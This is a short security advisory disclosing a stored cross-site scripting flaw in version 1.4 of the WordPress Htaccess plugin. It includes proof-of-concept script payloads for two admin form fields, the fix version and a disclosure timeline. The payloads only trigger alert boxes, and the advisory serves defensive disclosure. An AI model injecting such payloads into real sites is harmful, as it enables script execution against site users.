WordPress Htaccess 1.4 Cross Site Scripting
Posted on 17 December 2015
Plugin Name : Htaccess Effected Version : 1.4 (and most probably lower version's if any) Vulnerability : A3-Cross-Site Scripting (XSS) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Administrator PoC - (Proof of Concept) : The following fields put the payload as below http://localhost/wp-admin/admin.php?page=htaccess.php htccss_allow = “></textarea><script>alert(1)</script> htccss_deny = “></textarea><script>alert(2)</script> Vulnerable Parameter : htccss_allow, htccss_deny Type of XSS : Stored Fixed in : 1.5 http://wordpress.org/plugins/htaccess/changelog/ Disclosure Timeline Vendor Contacted : 2014-08-04 Plugin Status : Updated on 2014-08-07 Public Disclosure : October 3, 2015 CVE Number : Not assigned yet Plugin Description : The plugin Htaccess allows to controll access to your website. Access can be controlled based on the client's hostname, IP address, or other characteristics of the client's request. It is very simple and has just two the directives like Allow and Deny.
